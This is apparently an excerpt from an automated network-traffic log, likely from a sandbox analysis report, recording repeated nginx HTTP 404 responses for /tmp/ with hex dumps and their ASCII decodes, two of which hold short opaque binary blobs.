Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:27:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:27:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:27:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:27:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 20 5f 24 14 a6 60 44 aa ae 1e bd ca b6 e5 12 9c 21 c1 f7 6c 73 1b 98 8f 9d cb 77 c0 37 1b 14 ba 11 9e 58 72 56 1a b8 83 70 Data Ascii: #\ _$`D!lsw7XrVp
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:27:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:27:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:27:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:27:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:27:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:27:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:27:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:27:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 1c 7d 51 ba 3c 0b e9 f3 51 fa 91 ee af 36 d9 2f d9 e8 22 59 14 c1 d3 dd 9d 3c 83 66 5b 1b 90 11 9e 50 68 54 51 af 88 7c e1 7e ed 42 0e 1b 39 06 13 9c 3d a7 23 06 bc Data Ascii: #\6}Q<Q6/"Y<f[PhTQ\|~B9=#
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:28:02 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:28:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:28:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:28:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 